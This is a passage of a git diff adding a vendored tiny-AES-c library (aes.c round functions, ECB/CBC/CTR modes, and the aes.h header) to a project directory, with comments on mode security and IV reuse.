+ return ((x<<1) ^ (((x>>7) & 1) * 0x1b));
+}
+
+// MixColumns function mixes the columns of the state matrix
+static void MixColumns(state_t* state)
+{
+ uint8_t i;
+ uint8_t Tmp, Tm, t;
+ for (i = 0; i < 4; ++i)
+ {
+ t = (*state)[i][0];
+ Tmp = (*state)[i][0] ^ (*state)[i][1] ^ (*state)[i][2] ^ (*state)[i][3] ;
+ Tm = (*state)[i][0] ^ (*state)[i][1] ; Tm = xtime(Tm); (*state)[i][0] ^= Tm ^ Tmp ;
+ Tm = (*state)[i][1] ^ (*state)[i][2] ; Tm = xtime(Tm); (*state)[i][1] ^= Tm ^ Tmp ;
+ Tm = (*state)[i][2] ^ (*state)[i][3] ; Tm = xtime(Tm); (*state)[i][2] ^= Tm ^ Tmp ;
+ Tm = (*state)[i][3] ^ t ; Tm = xtime(Tm); (*state)[i][3] ^= Tm ^ Tmp ;
+ }
+}
+
+// Multiply is used to multiply numbers in the field GF(2^8)
+// Note: The last call to xtime() is unneeded, but often ends up generating a smaller binary
+// The compiler seems to be able to vectorize the operation better this way.
+// See https://github.com/kokke/tiny-AES-c/pull/34
+#if MULTIPLY_AS_A_FUNCTION
+static uint8_t Multiply(uint8_t x, uint8_t y)
+{
+ return (((y & 1) * x) ^
+ ((y>>1 & 1) * xtime(x)) ^
+ ((y>>2 & 1) * xtime(xtime(x))) ^
+ ((y>>3 & 1) * xtime(xtime(xtime(x)))) ^
+ ((y>>4 & 1) * xtime(xtime(xtime(xtime(x)))))); /* this last call to xtime() can be omitted */
+ }
+#else
+#define Multiply(x, y) \
+ ( ((y & 1) * x) ^ \
+ ((y>>1 & 1) * xtime(x)) ^ \
+ ((y>>2 & 1) * xtime(xtime(x))) ^ \
+ ((y>>3 & 1) * xtime(xtime(xtime(x)))) ^ \
+ ((y>>4 & 1) * xtime(xtime(xtime(xtime(x)))))) \
+
+#endif
+
+#if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1)
+// MixColumns function mixes the columns of the state matrix.
+// The method used to multiply may be difficult to understand for the inexperienced.
+// Please use the references to gain more information.
+static void InvMixColumns(state_t* state)
+{
+ int i;
+ uint8_t a, b, c, d;
+ for (i = 0; i < 4; ++i)
+ {
+ a = (*state)[i][0];
+ b = (*state)[i][1];
+ c = (*state)[i][2];
+ d = (*state)[i][3];
+
+ (*state)[i][0] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09);
+ (*state)[i][1] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d);
+ (*state)[i][2] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b);
+ (*state)[i][3] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e);
+ }
+}
+
+
+// The SubBytes Function Substitutes the values in the
+// state matrix with values in an S-box.
+static void InvSubBytes(state_t* state)
+{
+ uint8_t i, j;
+ for (i = 0; i < 4; ++i)
+ {
+ for (j = 0; j < 4; ++j)
+ {
+ (*state)[j][i] = getSBoxInvert((*state)[j][i]);
+ }
+ }
+}
+
+static void InvShiftRows(state_t* state)
+{
+ uint8_t temp;
+
+ // Rotate first row 1 columns to right
+ temp = (*state)[3][1];
+ (*state)[3][1] = (*state)[2][1];
+ (*state)[2][1] = (*state)[1][1];
+ (*state)[1][1] = (*state)[0][1];
+ (*state)[0][1] = temp;
+
+ // Rotate second row 2 columns to right
+ temp = (*state)[0][2];
+ (*state)[0][2] = (*state)[2][2];
+ (*state)[2][2] = temp;
+
+ temp = (*state)[1][2];
+ (*state)[1][2] = (*state)[3][2];
+ (*state)[3][2] = temp;
+
+ // Rotate third row 3 columns to right
+ temp = (*state)[0][3];
+ (*state)[0][3] = (*state)[1][3];
+ (*state)[1][3] = (*state)[2][3];
+ (*state)[2][3] = (*state)[3][3];
+ (*state)[3][3] = temp;
+}
+#endif // #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1)
+
+// Cipher is the main function that encrypts the PlainText.
+static void Cipher(state_t* state, const uint8_t* RoundKey)
+{
+ uint8_t round = 0;
+
+ // Add the First round key to the state before starting the rounds.
+ AddRoundKey(0, state, RoundKey);
+
+ // There will be Nr rounds.
+ // The first Nr-1 rounds are identical.
+ // These Nr-1 rounds are executed in the loop below.
+ for (round = 1; round < Nr; ++round)
+ {
+ SubBytes(state);
+ ShiftRows(state);
+ MixColumns(state);
+ AddRoundKey(round, state, RoundKey);
+ }
+
+ // The last round is given below.
+ // The MixColumns function is not here in the last round.
+ SubBytes(state);
+ ShiftRows(state);
+ AddRoundKey(Nr, state, RoundKey);
+}
+
+#if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1)
+static void InvCipher(state_t* state, const uint8_t* RoundKey)
+{
+ uint8_t round = 0;
+
+ // Add the First round key to the state before starting the rounds.
+ AddRoundKey(Nr, state, RoundKey);
+
+ // There will be Nr rounds.
+ // The first Nr-1 rounds are identical.
+ // These Nr-1 rounds are executed in the loop below.
+ for (round = (Nr - 1); round > 0; --round)
+ {
+ InvShiftRows(state);
+ InvSubBytes(state);
+ AddRoundKey(round, state, RoundKey);
+ InvMixColumns(state);
+ }
+
+ // The last round is given below.
+ // The MixColumns function is not here in the last round.
+ InvShiftRows(state);
+ InvSubBytes(state);
+ AddRoundKey(0, state, RoundKey);
+}
+#endif // #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1)
+
+/*****************************************************************************/
+/* Public functions: */
+/*****************************************************************************/
+#if defined(ECB) && (ECB == 1)
+
+
+void AES_ECB_encrypt(const struct AES_ctx* ctx, uint8_t* buf)
+{
+ // The next function call encrypts the PlainText with the Key using AES algorithm.
+ Cipher((state_t*)buf, ctx->RoundKey);
+}
+
+void AES_ECB_decrypt(const struct AES_ctx* ctx, uint8_t* buf)
+{
+ // The next function call decrypts the PlainText with the Key using AES algorithm.
+ InvCipher((state_t*)buf, ctx->RoundKey);
+}
+
+
+#endif // #if defined(ECB) && (ECB == 1)
+
+
+
+
+
+#if defined(CBC) && (CBC == 1)
+
+
+static void XorWithIv(uint8_t* buf, const uint8_t* Iv)
+{
+ uint8_t i;
+ for (i = 0; i < AES_BLOCKLEN; ++i) // The block in AES is always 128bit no matter the key size
+ {
+ buf[i] ^= Iv[i];
+ }
+}
+
+void AES_CBC_encrypt_buffer(struct AES_ctx *ctx, uint8_t* buf, uint32_t length)
+{
+ uintptr_t i;
+ uint8_t *Iv = ctx->Iv;
+ for (i = 0; i < length; i += AES_BLOCKLEN)
+ {
+ XorWithIv(buf, Iv);
+ Cipher((state_t*)buf, ctx->RoundKey);
+ Iv = buf;
+ buf += AES_BLOCKLEN;
+ //printf("Step %d - %d", i/16, i);
+ }
+ /* store Iv in ctx for next call */
+ memcpy(ctx->Iv, Iv, AES_BLOCKLEN);
+}
+
+void AES_CBC_decrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, uint32_t length)
+{
+ uintptr_t i;
+ uint8_t storeNextIv[AES_BLOCKLEN];
+ for (i = 0; i < length; i += AES_BLOCKLEN)
+ {
+ memcpy(storeNextIv, buf, AES_BLOCKLEN);
+ InvCipher((state_t*)buf, ctx->RoundKey);
+ XorWithIv(buf, ctx->Iv);
+ memcpy(ctx->Iv, storeNextIv, AES_BLOCKLEN);
+ buf += AES_BLOCKLEN;
+ }
+
+}
+
+#endif // #if defined(CBC) && (CBC == 1)
+
+
+
+#if defined(CTR) && (CTR == 1)
+
+/* Symmetrical operation: same function for encrypting as for decrypting. Note any IV/nonce should never be reused with the same key */
+void AES_CTR_xcrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, uint32_t length)
+{
+ uint8_t buffer[AES_BLOCKLEN];
+
+ unsigned i;
+ int bi;
+ for (i = 0, bi = AES_BLOCKLEN; i < length; ++i, ++bi)
+ {
+ if (bi == AES_BLOCKLEN) /* we need to regen xor compliment in buffer */
+ {
+
+ memcpy(buffer, ctx->Iv, AES_BLOCKLEN);
+ Cipher((state_t*)buffer,ctx->RoundKey);
+
+ /* Increment Iv and handle overflow */
+ for (bi = (AES_BLOCKLEN - 1); bi >= 0; --bi)
+ {
+ /* inc will overflow */
+ if (ctx->Iv[bi] == 255)
+ {
+ ctx->Iv[bi] = 0;
+ continue;
+ }
+ ctx->Iv[bi] += 1;
+ break;
+ }
+ bi = 0;
+ }
+
+ buf[i] = (buf[i] ^ buffer[bi]);
+ }
+}
+
+#endif // #if defined(CTR) && (CTR == 1)
+
diff --git a/Source/Hamakaze/tinyaes/aes.h b/Source/Hamakaze/tinyaes/aes.h
new file mode 100644
index 0000000..87f1471
--- /dev/null
+++ b/Source/Hamakaze/tinyaes/aes.h
@@ -0,0 +1,90 @@
+#ifndef _AES_H_
+#define _AES_H_
+
+#include
+
+// #define the macros below to 1/0 to enable/disable the mode of operation.
+//
+// CBC enables AES encryption in CBC-mode of operation.
+// CTR enables encryption in counter-mode.
+// ECB enables the basic ECB 16-byte block algorithm. All can be enabled simultaneously.
+
+// The #ifndef-guard allows it to be configured before #include'ing or at compile time.
+#ifndef CBC
+ #define CBC 1
+#endif
+
+#ifndef ECB
+ #define ECB 1
+#endif
+
+#ifndef CTR
+ #define CTR 1
+#endif
+
+
+#define AES128 1
+//#define AES192 1
+//#define AES256 1
+
+#define AES_BLOCKLEN 16 //Block length in bytes AES is 128b block only
+
+#if defined(AES256) && (AES256 == 1)
+ #define AES_KEYLEN 32
+ #define AES_keyExpSize 240
+#elif defined(AES192) && (AES192 == 1)
+ #define AES_KEYLEN 24
+ #define AES_keyExpSize 208
+#else
+ #define AES_KEYLEN 16 // Key length in bytes
+ #define AES_keyExpSize 176
+#endif
+
+struct AES_ctx
+{
+ uint8_t RoundKey[AES_keyExpSize];
+#if (defined(CBC) && (CBC == 1)) || (defined(CTR) && (CTR == 1))
+ uint8_t Iv[AES_BLOCKLEN];
+#endif
+};
+
+void AES_init_ctx(struct AES_ctx* ctx, const uint8_t* key);
+#if (defined(CBC) && (CBC == 1)) || (defined(CTR) && (CTR == 1))
+void AES_init_ctx_iv(struct AES_ctx* ctx, const uint8_t* key, const uint8_t* iv);
+void AES_ctx_set_iv(struct AES_ctx* ctx, const uint8_t* iv);
+#endif
+
+#if defined(ECB) && (ECB == 1)
+// buffer size is exactly AES_BLOCKLEN bytes;
+// you need only AES_init_ctx as IV is not used in ECB
+// NB: ECB is considered insecure for most uses
+void AES_ECB_encrypt(const struct AES_ctx* ctx, uint8_t* buf);
+void AES_ECB_decrypt(const struct AES_ctx* ctx, uint8_t* buf);
+
+#endif // #if defined(ECB) && (ECB == !)
+
+
+#if defined(CBC) && (CBC == 1)
+// buffer size MUST be mutile of AES_BLOCKLEN;
+// Suggest https://en.wikipedia.org/wiki/Padding_(cryptography)#PKCS7 for padding scheme
+// NOTES: you need to set IV in ctx via AES_init_ctx_iv() or AES_ctx_set_iv()
+// no IV should ever be reused with the same key
+void AES_CBC_encrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, uint32_t length);
+void AES_CBC_decrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, uint32_t length);
+
+#endif // #if defined(CBC) && (CBC == 1)
+
+
+#if defined(CTR) && (CTR == 1)
+
+// Same function for encrypting as for decrypting.
+// IV is incremented for every block, and used after encryption as XOR-compliment for output
+// Suggesting https://en.wikipedia.org/wiki/Padding_(cryptography)#PKCS7 for padding scheme
+// NOTES: you need to set IV in ctx with AES_init_ctx_iv() or AES_ctx_set_iv()
+// no IV should ever be reused with the same key
+void AES_CTR_xcrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, uint32_t length);
+
+#endif // #if defined(CTR) && (CTR == 1)
+
+
+#endif //_AES_H_